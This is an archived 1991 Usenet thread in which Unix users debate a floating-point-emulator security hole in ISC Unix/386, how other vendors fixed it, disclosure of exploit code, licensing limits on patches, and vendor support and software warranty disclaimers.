#define CUTESAYING "Lead, follow, or get the hell out of the way."

chip@chinacat.Unicom.COM (Chip Rosenthal) (02/21/91)

In article <1991Feb20.005322.24769@scuzzy.in-berlin.de>
	src@scuzzy.in-berlin.de (Heiko Blume) writes:
>well, HOW did they [SCO] fix it???

By looking at <sys/user.h>, it looks like they used the AT&T 3.2.1
approach.  The fp registers appear at the very top of the structure,
along with kstack.  Therefore, this page could be mapped into user
space, leaving the second page with the sensitive stuff untouchable.

What I'm really curious about is how XENIX does it.  The fp emulation
is done in the kernel, but it does not appear that XENIX maps any
portion of the user structure into user space.  I think I've found
the address at which user is placed, but any attempt to access it
dumps core.  I'm wondering if the working registers for the fp emulator
are maintained elsewhere, and moved into/out of the user structure
when a process is scheduled/unscheduled, just as the hardware coprocessor
registers are.

-- 
Chip Rosenthal  512-482-8260  |
Unicom Systems Development    |    I saw Elvis in my wtmp file.
<chip@chinacat.Unicom.COM>    |

cpcahil@virtech.uucp (Conor P. Cahill) (02/21/91)

jca@pnet01.cts.com (John C. Archambeau) writes:
>Now this is getting to be a bloody sick joke.  I find it a little bit
>difficult to believe that there just isn't a simple binary patch for os.o much
>along the same lines as the inode patch that has been floating around for

Think about this.  The problem is that a certain area of the user structure
needs to be writable while the rest is read-only.  This will probably require
shifting the elements of the structure around, or at least changing the offsets
so that the writable portion ends up on it's own page.

This kind of change will require a recompile of every module that accesses
the user structure plus some additional changes in the setup code that places
the user structure at virtual adress 0xE...

This is definately a much larger change than that required for the inode
bug fix.

>This is going about as well as a SCUD missile attack.  Maybe we should get Joe
>Isuzu to head ISC tech support.  At least then we know that we're getting the
>shaft and ISC is getting the gold mine.

Yes ISC made a big mistake in letting this bug go. HOWEVER, they are trying 
to get a fix out as soon as they can.  This is not a small change and if they
were to send it out and it introduced an additional problem you would all 
be screeming louder.  The change has to be made, the new kernel has to be
tested and they will have to test the program level also, to make sure that
no problems were introduced there.

Once that is completed they have to put the patch together, get the disks
duplicated, and send them out. 

This will take time.  I too thought posting the fix would be appropriate, but
if there is a licensing agreement that stands in the way, there is nothing that
ISC can do about it.

>I want the patch in my hot little hands before the customer goes out and buys
>ISC.  Such security holes are intolerable.

Yes we all agree on this, even ISC.  

-- 
Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
                                                Sterling, VA 22170 

richard@pegasus.com (Richard Foulk) (02/21/91)

>Now this is getting to be a bloody sick joke.  I find it a little bit
>difficult to believe that there just isn't a simple binary patch for os.o much
>along the same lines as the inode patch that has been floating around for
>ages.  Might I remind you that SCO provides their patches and fixes to the
>public via anonymous UUCP.

`No imagination' seems like a good explanation.


-- 
Richard Foulk		richard@pegasus.com

vjs@calcite.UUCP (Vernon Schryver) (02/22/91)

In article <15342@uudell.dell.com>, mjhammel@Kepler.dell.com (Michael J. Hammel) writes:
>   ...[many reasonable words deleted]....
> Michael J. Hammel        | mjhammel@{Kepler|socrates}.dell.com
> Dell Computer Corp.      | {73377.3467|76424.3024}@compuserve.com

I'm overwhelmed.  Mr. Hammel's note seems honest and accurate.  My long
experience with "QA departments" in more than 1 or 2 companies is that he
is one of the fabled good test people.  The other 95% and their management
make a good case for eugenics.  Those are the ones who claim to think a
test plan would find all bugs, who never find one real bug on their own,
and who file zillions of "control-D logs out the shell" reports and require
senior management intervention before they'll close them.

It's too bad Mr. Hammel is in TX; I can't point my daytime employer's
recruiters at him.  Maybe I should look into Dell's SV for my PC.

Vernon Schryver,   vjs@calcite.uucp

sef@kithrup.COM (Sean Eric Fagan) (02/22/91)

In article <1991Feb21.141349.26015@virtech.uucp> cpcahil@virtech.uucp (Conor P. Cahill) writes:
>This kind of change will require a recompile of every module that accesses
>the user structure plus some additional changes in the setup code that places
>the user structure at virtual adress 0xE...

Which happens to include just about every device driver, and *does* include
things like NFS.  No, it's not an easy change (well, actually, it's an
*easy* change to make, provided you do it with all the sources to
everything, and then recompile it all 8-().  I, personally, am interested to
see if they are going to do it in a compatable manner...

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

alex@am.sublink.org (Alex Martelli) (02/22/91)

pax@megasys.com (Garry M. Paxinos) writes:
	...
:   for vendor hackery, read Ritchie's musing on what can be done with
:   virusing 'cc' in his Turing award lecture in CACM.
:
:Offhand, do you know which issue?

It's actually Thompson's 1983 Turing Award Lecture, "Reflections on 
Trusting Trust" (Ritchie, co-winner, spoke about "Reflections on
Software Research"), and it's reprinted in "ACM Turing Award Lectures,
the first twenty years 1966-1985", ACM Press Anthology Series 
(Addison-Wesley, NY, ISBN 0-201-07794-9).  Sorry, I don't know the
original CACM issue number - the anthology is well worth buying, though
(there's Perlis, Wilkes, Hamming, Minsky... up to Wirth, then Karp...).
-- 
Alex Martelli - (home snailmail:) v. Barontini 27, 40138 Bologna, ITALIA
Email: (work:) staff@cadlab.sublink.org, (home:) alex@am.sublink.org
Phone: (work:) ++39 (51) 371099, (home:) ++39 (51) 250434; 
Fax: ++39 (51) 366964 (work only), Fidonet: 332/401.3 (home only).

rhealey@digibd.com (Rob Healey) (02/22/91)

In article <1991Feb14.142947.1777@metaware.metaware.com> ken@metaware.UUCP (ken) writes:
>In article sef@kithrup.COM (Sean Eric Fagan) writes:
>-In article bekesy@uhccux.uhcc.Hawaii.Edu (Bekesey Lab) writes:
>----Now, the question is, what do we do to protect ourselves in the meantime?
>---Get SCO.  [...]
>--Please keep your mindless SCO chauvinism to yourself.
>-Gee, that's funny.  When people complain all about SCO's problems, and other
>-people respond with "Get ISC or ESIX," I don't see you complaining about
>-that.
>
>I think you got flammed for posting a rather blatent advertisement for SCO.
>Most people probably know that you work there and that you have rather biased
>opinions about SCO's products.  That type of posting is generally frowned
>upon.  
>
	Strange, I've seen alot of articles that are blatant advertisements
	for ESIX or ISC as well. I have zero ways to tell if those people
	are intimately involved with the respective companys or not. How
	could I tell that kithrup.com was a "sco.com" in a mask? How could
	I tell that the sites smashing SCO and praising ISC/ESIX really
	aren't ISC/ESIX people in a mask?

	I personally thought ISC was lacking a few months ago and thus
	argued for SCO at our site. ISC felt very rough around the edges
	and gave me an uneasy feeling about the overall reliability. SCO
	has it's problems but it feels less ragged than ISC. Once you
	get used to the Secureware abortion it runs pretty good.

	Now, I have good reason to believe my gut level impressions of ISC from
	a few months ago...

	-Rob

Speaking for self, not company.

rhealey@digibd.com (Rob Healey) (02/22/91)

In article <1991Feb14.174314.475@ux1.cso.uiuc.edu> brando@uicsl.csl.uiuc.edu (Brandon Brown) writes:
>davidg@aegis.UUCP (Dave McLane) writes:
>>As a sample of how "fast" ISC responds, I have been trying for a
>>month to get them to send me a replacement for the disk that was
>>supposed to update my $2149 Architech Developer to Multi-User. The
>>disk got an Uncorrectable data read error, not doubt because the
>>little cutout for the timing signal hole was running around loose
>>in the disk which happened to drop out on my foot when I pulled the
>>disk out ... "Eh, what's that. Oh shit!"
>
>Dave, sorry you have had a "bad experience" with ISC. I have never had
>anything but GREAT response, even a time when I trashed my install diskette
>4 times before moving my 16-bit video card to an 8-bit slot. (Terrible fix,
>I know, but all I wanted to do was get a working system going.) On each
>occasion I received a replacement install disk UPS RED. 
>
	Maybe you've had great response because your site is a huge
	customer rather than a single user or small company?

	It surprised me how vendor attitude changed when I called them
	as a single user vs. a worker at a University. I was treated like
	sh*t when I called as a single user, I was treated like a king
	when I called as a rep. of the U. What do you think my opinions
	of those companys were? Guess which companys didn't get my
	recommendation when time came to upgrade or purchase?

	The good companys treat EVERY customer well, not just the big
	accounts.

		-Rob

Speaking for self, not company.

rhealey@digibd.com (Rob Healey) (02/22/91)

In article <6938@rsiatl.Dixie.Com> jgd@Dixie.Com (John G. DeArmond) writes:
>Could it be that the spat of silence from many people who normally would
>be at Dresden incendiary levels by now is because their lawyers have told them
>to keep their mouths shout while they prepare cases?
>
	Take a look at the disclaimer on the OS box... No software
	company can be sued because you accepted a disclaimer when you
	open the seals on the packaging. If you read it carefully it
	says that YOU the USER take all the responsibility and the software
	supplier cannot be blamed for anything, damage or loss of data,
	that results from the use of the software.

	My guess is that corporate lawyers all over the country have their jaws
	dropped to the floor that anyone in their respective companys would use
	such stuff.

	I'm sure someone will TRY to sue ISC but I doubt anything will come of
	it other than bad publicity for ISC... B^(.

	This is the major problem with the software profession, no one can
	be held legally accountable for anything despite the fact the
	supplier may be morally bankrupt... B^(.

		-Rob

Speaking for self, not company.

rhealey@digibd.com (Rob Healey) (02/22/91)

In article <1991Feb15.134715.16979@virtech.uucp> cpcahil@virtech.uucp (Conor P. Cahill) writes:
>	2. I wholeheartly DISAGREE with you posting the source code which
>	   performs the security bypass.  You could have just posted the
>	   uuencoded binary which would have been enough to prove your point
>	   without making it extremely easy for any two bit user to obtain
>	   privileged access.  Yes a dedicated hacker could have decoded
>	   your explanation and/or the binary and figure out how to replicate
>	   your code, but the number of those is MUCH less than the number
>	   of people who can now violate the security of the system using
>	   your posted code.
>
>	   POSTING THE CODE WAS DEAD WRONG. 
>
	Ummm, how many people out there are willing to run a uuencoded
	BINARY on your system that reportedly will have root access
	while it is running? Can you say MASSIVE virus possibility?

	How could all the other OS's have DEFINITIVLY checked for the
	error assuming the supposedly ABI systems weren't quite?

	  POSTING THE CODE WAS THE DEAD RIGHT THING TO DO.

	As a responsible sys. admin I would NEVER run a binary of that
	type without CAREFULLY examining the source code first. The chance
	for a VIRUS is just too great. I can always pull my modems and
	"lash" offending users. Once a virus is planted into my system
	with a binary how do I flush it out FOR SURE?

		'Nuff said,

		-Rob

Speaking for self, not company.

werme@Alliant.COM (Ric Werme) (02/22/91)

In article <7667@crash.cts.com> jca@pnet01.cts.com (John C. Archambeau) writes:
>martys@mchale.ism.isc.com (Marty Stewart) writes:
>>	Under the AT&T licensing agreement, INTERACTIVE cannot post AT&T
>>code to a site where any user can pick it up.
>
>Now this is getting to be a bloody sick joke.  I find it a little bit
>difficult to believe that there just isn't a simple binary patch for os.o much
>along the same lines as the inode patch that has been floating around for
>ages.  Might I remind you that SCO provides their patches and fixes to the
>public via anonymous UUCP.

No, just a good reason for you to volunteer to help gnu finish their unix.
I find it difficult to believe that a could involve a single .o file.  I'd
be inclined to put the FP regs in a completely separate page, either a page
in the U area or a page pointed at by the U area and swapped separately.
Either change would change the offsets of all U area data that follows and
require recompiling all OS modules that use user.h.  There are a lot of them.

Yes, I'm aware of the hackery that could be done to eliminate the offset
screwup, but I'd still be impressed to see a patch to fix the problem that
doesn't disable proper features.

-- 

| A pride of lions              | Eric J Werme                   |
| A gaggle of geese             | uucp: mit-eddie!alliant!werme  |
| An odd lot of programmers     | Phone: 508-486-1214            |

erik@gogoman.sf.ca.us (Erik Fortune) (02/22/91)

In article <1991Feb21.212518.3528@digibd.com> rhealey@digibd.com (Rob Healey) writes:
>	Maybe you've had great response because your site is a huge
>	customer rather than a single user or small company?
>
>	It surprised me how vendor attitude changed when I called them
>	as a single user vs. a worker at a University. I was treated like
>	sh*t when I called as a single user, I was treated like a king
>	when I called as a rep. of the U. What do you think my opinions
>	of those companys were? Guess which companys didn't get my
>	recommendation when time came to upgrade or purchase?
>
>	The good companys treat EVERY customer well, not just the big
>	accounts.

[ unaffiliated plug for SCO support here coming up.   Anyone who
  believes that SCO is evil should probably skip this message to
  avoid cognitive dissonance. ]

Just another point of data here:

    I've reported several bugs to SCO (as a single user, not a large
customer) via email.    They always call me the next morning to talk
about the problem and make sure that they understand it.   Within
a few days I get a followup email message.   I've had them call back
to clarify subtleties or omissions in the bug reports.   I haven't
upgraded yet, so I don't know if they actually fix my bugs :-), but they
sure put on a pretty good show considering that I'm a quantity one
customer.  Oh, yeah -- I'm not in the developer program, and I'm
not paying for additional support.

    I've downloaded quite a few maintenance and enhancement supplements
from their uucp machine sosco.    All have installed and operated flawlessly.

    I've asked for two SLS free supplements from SCO via mail (not all
supplements are on sosco, I'd guess anything with AT&T code is not
available).   One was shipped blue label, the other is out of stock 
so I'm on a two week waiting list.   All in all, nothing to complain
about (we'll see when the disk actually shows up:-).

-- Erik
   erik@gogoman.sf.ca.us

pete@tcom.stc.co.uk (Peter Kendell) (02/22/91)

From article <473@bria>, by <somebody>:
 
} It matters not who is to _blame_.  It does matter who's _responsible_.
} You bought your car from Ford.  The motor flies out of the hood because
} of defective bolts.  You go to Ford, and they say "Sorry, but you'll have
} to talk to ``XYZ Bolt''.  It's not our problem because _we_ didn't make
} the bolts."  I personally wouldn't sit still for this, and I doubt you
} would either.

You don't go to Ford, you go to the retailer who sold you the product.
Otherwise, quite right.
 
} The reseller should be responsible for what is sold.  When I buy a flavor
} of UNIX, I am buying a complete package, not just modifications.  (Those
} who thrive on the legal aspects of this will point out that all you're
} really buying is diskettes.  Fine, but a company who treats its customers
} accoring to that criteria won't be in business very long.)

Absolutely.  When I see the (all too common) form of licence that says
(paraphrased) "We'll exchange the media if faulty, but otherwise we
don't guarantee that this product is good for anything in particular
and we won't be responsible for any havoc it may cause to your business
if it's faulty" I wonder what it is that I'm actually *buying*.  It's
enough to turn anyone into a software thief...

In the UK we have the concept of 'merchantable quality'.  That is, if
you sell something, like a car or an operating system licence, then
it's got to do what a reasonable person (tm) would expect such a thing
to do and not to behave in such a way as to endanger the buyer.  This
concept is independent of supplier warranties.

Peter

goer@ellis.uchicago.edu (Richard L. Goerwitz) (02/22/91)

In article <7@gogoman.sf.ca.us> erik@gogoman.sf.ca.us (Erik Fortune) writes:
>>
>>	The good companys treat EVERY customer well, not just the big
>>	accounts.
>
>[ unaffiliated plug for SCO support here coming up....
>
>    I've reported several bugs to SCO (as a single user, not a large
>customer) via email.    They always call me the next morning to talk
>about the problem and make sure that they understand it.   Within
>a few days I get a followup email message....

I've also called SCO for various reasons, as a single user, and have
never received anything remotely resembling a brush-off.  When having
trouble with a Xenix tape driver, they sent me an upgrade to 2.3.2
for nothing.  Other problems were handled in similarly effective ways.

One other thing to consider is this:  SCO is relatively new to the
overburdened Unix world.  Xenix was, for some years, the SCO product
par excellance.  If the quality of Xenix is any guide to how SCO will
handle their new Unix product, then I would expect SCO to be at least
as smart a buy as ISC, Esix, Dell, or the like.

I will probably not being doing business with SCO in the future, not
because of price, but simply because I am an individual user, doing
academic research on a single machine.  SCO is just too expensive.
It's just too easy to use the Suns at school, which are bought at a
great price, and offer a nice working environment.

-Richard (goer@sophist.uchicago.edu)

brando@uicsl.csl.uiuc.edu (Brandon Brown) (02/22/91)

rhealey@digibd.com (Rob Healey) writes:

>>Dave, sorry you have had a "bad experience" with ISC. I have never had
>>anything but GREAT response, even a time when I trashed my install diskette
>>4 times before moving my 16-bit video card to an 8-bit slot. (Terrible fix,
>>I know, but all I wanted to do was get a working system going.) On each
>>occasion I received a replacement install disk UPS RED. 
>>
>	Maybe you've had great response because your site is a huge
>	customer rather than a single user or small company?

Well, considering my little business has one employee, "me", most would consider
it a small company. But, as you state later in your message, the same
feelings I have. Everyone is important. Small guy to the large company.
Many times it is the small guy that influences many other sales. If a 
company tries to screw with me in the manner you describe, I simply threaten
to never recommend their product to anyone else. With a client list of
several "small" local companies, a few larger companies, and working for a
University, I generally don't catch much from companies. But, I can assure you,
again, ISC treats me well....

>	It surprised me how vendor attitude changed when I called them
>	as a single user vs. a worker at a University. I was treated like
>	sh*t when I called as a single user, I was treated like a king
>	when I called as a rep. of the U. What do you think my opinions
>	of those companys were? Guess which companys didn't get my
>	recommendation when time came to upgrade or purchase?

>	The good companys treat EVERY customer well, not just the big
>	accounts.

+-----------------------------------------------------------------------------+
|  Brandon Brown                     | Internet: brando@uicsl.csl.uiuc.edu    |
|  Coordinated Science Laboratory    | UUCP:	 uiucuxc!addamax!brando!brown |
|  University of Illinois            | CompuServe: 73040,447                  |
|  Urbana, IL  61801                 | GEnie:    macbrando                    |
+-----------------------------------------------------------------------------+

flint@gistdev.gist.com (Flint Pellett) (02/23/91)

cpcahil@virtech.uucp (Conor P. Cahill) writes:

>This will take time.  I too thought posting the fix would be appropriate, but
>if there is a licensing agreement that stands in the way, there is nothing that
>ISC can do about it.

Wrong.  ISC can go to AT&T and say "Please give us permission to
violate the licensing agreement and post this fix."  Then AT&T can
decide if they want to "do the right thing" and let it be posted, or
if they are so interested in protecting themselves that they would
rather see a lot of other people get hurt.  I would hope that AT&T
would have at least some moral sense.
-- 
Flint Pellett, Global Information Systems Technology, Inc.
1800 Woodfield Drive, Savoy, IL  61874     (217) 352-1165
uunet!gistdev!flint or flint@gistdev.gist.com

rhealey@digibd.com (Rob Healey) (02/23/91)

In article <1991Feb19.042353.27075@chinet.chi.il.us> pdg@chinet.chi.il.us (Paul Guthrie) writes:
>I'm sick of people calling this a "gaping
>kind-you-can-drive-a-truck-through hole" in UNIX security.  If it
>was so gaping, how come it has never come up here before, like so
>many other obscure problems?  ISC was fixing this, and if that
>idiot had kept his mouth shut, it would have been fixed in time,
>without many of us rushing out to buy coprocessors. 

[ More "blaming the victim" deleted. ]

	AT&T fixed the bug quite a while ago. SCO and Dell did too. The
	reason most of us are shocked is because of the fundemental
	nature of this bug/"feature" and the implecations that it makes
	toward responsibility of vendors. The bug IS a
	"gaping kind-you-can-drive-an-ocean-liner-through-hole" in UNIX
	security. Do you SERIOUSLY think that ISC would have fixed this
	bug WITHOUT all this negative publicity? I SINCERLY doubt it due
	to the fact they DOCUMENTED it and let it slide for well over a year
	after AT&T found it.

	This is a VERY sad statement for the state of software vendors today.

	What's even sadder is that "shrink wrap" license that protects
	EVERY software vendor from being responsible for ANYTHING. REALLY
	read that disclaimer sometime, all fault is shoved on the USER
	and NOT the provider. EVERY piece of software you have has this
	on it, NO vendor is responsible for the software they produce.
	THAT is the saddest part of all of this. The software industry
	has 0/ziltch/nada/none legal responsibility to the user
	community. The only "bone" thrown to a user is that some companys
	MIGHT choose to be morally responsible...

	By the agreement on the ISC boxes, ISC CAN NOT BE HELD RESPONSIBLE
	for ANY damages resulting from use, or misuse, of their product.

	EVERY piece of software you "own" is the same. I would be VERY
	surprised if anything legal came out of this. As one person
	already said, the ONLY thing software companys are legally
	bound to do is provide you with defect free media; NOTHING else.

	Think about it...

		-Rob

Speaking for self, not company.

peter@ficc.ferranti.com (Peter da Silva) (02/23/91)

In article <1991Feb22.111748.22010@tcom.stc.co.uk> pete@tcom.stc.co.uk (Peter Kendell) writes:
> don't guarantee that this product is good for anything in particular
> and we won't be responsible for any havoc it may cause to your business
> if it's faulty" I wonder what it is that I'm actually *buying*.  It's
> enough to turn anyone into a software thief...

In the book "Good Omens", one character (a demon) sends a bunch of these
licenses to the Immortal Souls Contract department in Hell, with the
pencilled notation "Learn, Guys".

In any case:

> In the UK we have the concept of 'merchantable quality'.

In the U.S. it's the "implied warranty of merchantability".
-- 
Peter da Silva.  `-_-'  peter@ferranti.com
+1 713 274 5180.  'U`  "Have you hugged your wolf today?"

rhealey@digibd.com (Rob Healey) (02/23/91)

In article <1991Feb20.005322.24769@scuzzy.in-berlin.de> src@scuzzy.in-berlin.de (Heiko Blume) writes:
>>SCO managed to get it working before their first release; AT&T and Dell
>>managed to get it "fixed" for their second release.  All without having to
>>redesign an enormous program written entirely in assembly.  Or would you
>>rather that the fpu emulator have more bugs introduced?
>well, HOW did they fix it???

	I'll take a flying leap blind guess and say that they probably
	moved the location of the "registers"/"code" to a seperate
	page in memory that could have different MMU tags from the u block.

	This would seem to be the obvious solution, but again, it's just
	a guess.

		-Rob

edhall@rand.org (Ed Hall) (02/23/91)

In article <4507@alliant.Alliant.COM> werme@Alliant.COM (Ric Werme) writes:
>In article <7667@crash.cts.com> jca@pnet01.cts.com (John C. Archambeau) writes:
>I'd be inclined to put the FP regs in a completely separate page, either a
>page in the U area or a page pointed at by the U area and swapped separately.

Ah, but remember, the '386 has segmentation as well!  Just put the
u structure out of reach for the default segments, and add another
segment that only covers the FP register area.  Of course, this would
mean that the emulator would probably have to reload a segment register
or two, but that's lots faster than entering the kernel.  I suspect
there are other ways, though...

		-Ed Hall
		edhall@rand.org

richard@pegasus.com (Richard Foulk) (02/23/91)

>In article <6938@rsiatl.Dixie.Com> jgd@Dixie.Com (John G. DeArmond) writes:
>>Could it be that the spat of silence from many people who normally would
>>be at Dresden incendiary levels by now is because their lawyers have told them
>>to keep their mouths shout while they prepare cases?
>>
>	Take a look at the disclaimer on the OS box... No software
>	company can be sued because you accepted a disclaimer when you
>	open the seals on the packaging. If you read it carefully it
>	says that YOU the USER take all the responsibility and the software
>	supplier cannot be blamed for anything, damage or loss of data,
>	that results from the use of the software.

This is just plain silly.  You're making a number of ridiculous assumptions
(including the one about the buyer actually having read the disclaimer.)

But to say that "No software company can be sued because ...", makes
one wonder where you've been the last ten years.  Companies and individuals
can and do sue for anything and everything -- irregardless of disclaimers,
contracts and other such paper.

Besides, there are federal and state laws that make such unfair and sweeping
disclaimers invalid.

It would seem that the purpose of such disclaimers is to make gullible
people like you think you have no recourse.

>	This is the major problem with the software profession, no one can
>	be held legally accountable for anything despite the fact the
>	supplier may be morally bankrupt... B^(.

This is just not true.

-- 
Richard Foulk		richard@pegasus.com

werme@Alliant.COM (Ric Werme) (02/24/91)

In article <1991Feb21.212518.3528@digibd.com> rhealey@digibd.com (Rob Healey) writes:
>In article <1991Feb14.174314.475@ux1.cso.uiuc.edu> brando@uicsl.csl.uiuc.edu (Brandon Brown) writes:
>>davidg@aegis.UUCP (Dave McLane) writes:
>>>As a sample of how "fast" ISC responds, I have been trying for a
>>>month to get them to send me a replacement for the disk that was
>>>supposed to update my $2149 Architech Developer to Multi-User.

>>Dave, sorry you have had a "bad experience" with ISC. I have never had
>>anything but GREAT response, even a time when I trashed my install diskette
>>4 times before moving my 16-bit video card to an 8-bit slot

>	Maybe you've had great response because your site is a huge
>	customer rather than a single user or small company?

Well, I just broke down and bought a 386 box and ISC unix for home use.  The
system runs DOS just fine, but seems to have some sort of problem and likes
to eat ISC install diskettes.  Despite problems with telephone tag (could it
be caused by angry USENETters tying up phone lines?), they shipped out a new
disk Fed Ex.

I forgot to ask about a USENET support address.

Too bad ISC didn't implement a ram disk or something so the install disk
doesn't need to be write enabled.  I understand thats a point for SCO.
It's not hard to do, we do it at Alliant.

Still don't have Unix up, but the system is back at the shop.  They've sold
lots of Unixes with the same hardware, so we're both pretty mystified at
the moment.
-- 

| A pride of lions              | Eric J Werme                   |
| A gaggle of geese             | uucp: mit-eddie!alliant!werme  |
| An odd lot of programmers     | Phone: 508-486-1214            |

steve@nuchat.sccsi.com (Steve Nuchia) (02/24/91)

In <1991Feb19.015227.26159@nuchat.sccsi.com>, I wrote
>> Unmitigated bullshit.

To which came the reply:

In article <54805@bigtex.cactus.org> james@bigtex.cactus.org (James Van Artsdalen) writes:
>oh?  I see you haven't thought the problem through yet.
...
>Now, think about sdb, and then propose a solution.

Yeah ok, I forgot about the debugger.  One more reason why you'd
really like to have the emulator keep its data in the u area.
It would be possible to fix the debugger -- it isn't like it
is portable code anyway -- but yuk.

>Remember, we're not out to remove things from the u block, only to
>make sure that important things aren't writable.  Those are very
>different goals.

The point I intended to make, which was obscured by my ill-considered
phrasing, was that any number of convenience or performance  considerations
can never justify leaving a security hole like that open.

>Also, remember that Sean is talking about SCO's *solution*, which
>already works and is in the field.  Until yours is implemented and
>working, don't be so quick to criticize.

Hmmm... I reread his article and couldn't see how you figure that.  I
must have missed some context.  It looked to me like he was justifying
the continued existence of the hole on the grounds that the u area
is the "proper" place to put the FP registers.  The only indication in
the article to which I responded that Sean did not mean it as a justification
was his quote marks around "proper".

Sorry about the noise.

-- 
Steve Nuchia	      South Coast Computing Services      (713) 964-2462
	"Innocence is a splendid thing, only it has the misfortune
	 not to keep very well and to be easily misled."
	    --- Immanuel Kant,  Groundwork of the Metaphysic of Morals

mpd@anomaly.SBS.COM (Michael P. Deignan) (02/25/91)

erik@gogoman.sf.ca.us (Erik Fortune) writes:

>    I've reported several bugs to SCO (as a single user, not a large
>customer) via email.    They always call me the next morning to talk
>about the problem and make sure that they understand it.   Within
>a few days I get a followup email message.   I've had them call back
>to clarify subtleties or omissions in the bug reports.   I haven't
>upgraded yet, so I don't know if they actually fix my bugs :-), but they
>sure put on a pretty good show considering that I'm a quantity one
>customer.  Oh, yeah -- I'm not in the developer program, and I'm
>not paying for additional support.

I, on the other hand, have had a terrible time attempting to get SCO's
TCP/IP installed (it craps out during the install process) and it took
two letters to "support@sco.com" before I got a response. That was a
month ago. Then we played phone tag for a week; finally I got a response
in email "gee, it works everywhere else just fine."

It's still on the shelf waiting to be properly installed.

MD

-- 
--  Michael P. Deignan                      / They're not "bombs". 
--  Domain: mpd@anomaly.sbs.com            /  They're "gifts".
--    UUCP: ...!uunet!rayssd!anomaly!mpd  /   "Gifts From Above".
-- Telebit: +1 401 455 0347              /

sef@kithrup.COM (Sean Eric Fagan) (02/25/91)

In article <389@frcs.UUCP> paul@frcs.UUCP (Paul Nash) writes:
>No it wasn't.  I have tested both the uuencoded and source versions
>on a vanilla Intel (nee Bell Tech) Unix/386 V.3.2 r2.0 system, 
                                                  ^^^^^^

I did not know that anybody called their initial release of a product "2.0".

-- 
Sean Eric Fagan  | "I made the universe, but please don't blame me for it;
sef@kithrup.COM  |  I had a bellyache at the time."
-----------------+           -- The Turtle (Stephen King, _It_)
Any opinions expressed are my own, and generally unpopular with others.

peter@ficc.ferranti.com (Peter da Silva) (02/26/91)

In article <1991Feb22.180214.12836@digibd.com> rhealey@digibd.com (Rob Healey) writes:
> 	By the agreement on the ISC boxes, ISC CAN NOT BE HELD RESPONSIBLE
> 	for ANY damages resulting from use, or misuse, of their product.

The validity of shrink-wrap licence agreements is still under debate, plus
there is an implied warranty in every advertisement ISC has printed.
-- 
Peter da Silva.  `-_-'  peter@ferranti.com
+1 713 274 5180.  'U`  "Have you hugged your wolf today?"

dvv@hq.demos.su (Dmitry V. Volodin) (02/26/91)

In <1991Feb23.073721.7800@rand.org> edhall@rand.org (Ed Hall) writes:

>Ah, but remember, the '386 has segmentation as well!  Just put the
>u structure out of reach for the default segments, and add another
>segment that only covers the FP register area.  Of course, this would
>mean that the emulator would probably have to reload a segment register
>or two, but that's lots faster than entering the kernel.  I suspect
>there are other ways, though...

Closing u completely for emulator won't work. The emulator should
work differently when the process is running on it's own and when
it is traced. Emulators usually try to execute as much floating
instructions in a row as possible, often causing problems for step-by-
step debugging - you command to step one instruction and the damned thing
doesn't stop until all the floating instructions are interpreted.
The right emulator should distinguish between traced and untraced mode,
and the only fast and reliable way to do it is to have u handy.

-- 
Dmitry V. Volodin <dvv@hq.demos.su>      |
fax:    +7 095 233 5016                  |      Call me Dima ('Dee-...)
phone:  +7 095 231 2129			 |

davidg@aegis.UUCP (Dave McLane) (02/26/91)

In <4511@alliant.Alliant.COM> werme@Alliant.COM (Ric Werme) writes:

>Well, I just broke down and bought a 386 box and ISC unix for home use.  The
>system runs DOS just fine, but seems to have some sort of problem and likes
>to eat ISC install diskettes.  Despite problems with telephone tag (could it
>be caused by angry USENETters tying up phone lines?), they shipped out a new
>disk Fed Ex.
>
>I forgot to ask about a USENET support address.

After one month of fruitless phone calls, ISC more or less refused
by default to give me a replacement for the multi-user extension
installation disk that was bad "out of the box".

The stated reason was that I didn't have such a disk as the serial
number of my system didn't include it, even though I faxed them a
receipt.  Luckily I got some help from Michel Steiner at
Programmers Connection who has said that ISC will send her the disk
and she will send it to me..... I hope to have it "real soon now"
as I started trying to get in February 12th.

I haven't taken the time to ask about the patch for the bug; who 
knows how long that will take.  I'd sure like to see a message from 
the first person who actually gets one!

--Dave  <dgm@nova.kuis.kyoto-u.ac.jp>

chris@alderan.uucp (Christoph Splittgerber) (02/26/91)

In article <1061@wa4mei.UUCP> rsj@wa4mei.UUCP (Randy Jarrett) writes:

>Yes it would be nice if they did that but until they do I write protect the
>install diskette as soon as i receive it and make a copy (3 or 4) with dd to
>do the install with. They have improved their install methods with each
[]

The problem here is, if you first install the system you don't have dd(1M)
running to do the backup and the MESS-DOS diskcopy does not work with the
ISC-boot disk :-(

        Chris
-- 
************************ Brain fault (core dumped) *************************
Replies-To:  chris@alderan.uucp        UUCP: uunet!mcsun!unido!alderan!chris 
Phone:       +49 711 344375            Fax:  +49 711 3460684

grant@bluemoon.uucp (Grant DeLorean) (02/27/91)

peter@ficc.ferranti.com (Peter da Silva) writes:

>> and we won't be responsible for any havoc it may cause to your business
>> if it's faulty" I wonder what it is that I'm actually *buying*.  It's
>> enough to turn anyone into a software thief...

>In the book "Good Omens", one character (a demon) sends a bunch of these
>licenses to the Immortal Souls Contract department in Hell, with the
>pencilled notation "Learn, Guys".

 Hmm, he sent them to the ISC department? Interesting match of TLAs... ;-}
-- 
 Grant DeLorean  (grant@bluemoon)    {n8emr|nstar}!bluemoon!grant

rsj@wa4mei.UUCP (Randy Jarrett) (02/28/91)

In <348@alderan.uucp> chris@alderan.uucp (Christoph Splittgerber) writes:

>In article <1061@wa4mei.UUCP> rsj@wa4mei.UUCP (Randy Jarrett) writes:

>>Yes it would be nice if they did that but until they do I write protect the
>>install diskette as soon as i receive it and make a copy (3 or 4) with dd to
>>do the install with. They have improved their install methods with each
>[]

>The problem here is, if you first install the system you don't have dd(1M)
>running to do the backup and the MESS-DOS diskcopy does not work with the
>ISC-boot disk :-(

>        Chris

If you can find a copy of PC-DOS ver 3.1 you can us it to make copies.
The diskcopy from it works.  Aparently changes made since then prevent
duplicating non-dos diskettes.
-- 
Randy Jarrett  WA4MEI 
UUCP  ...!{emory,gatech}!wa4mei!rsj   | US SNAIL: P.O. Box 941217
PHONE +1 404 493 9017		      |           Atlanta, GA 30341-0217

jca@pnet01.cts.com (John C. Archambeau) (03/01/91)

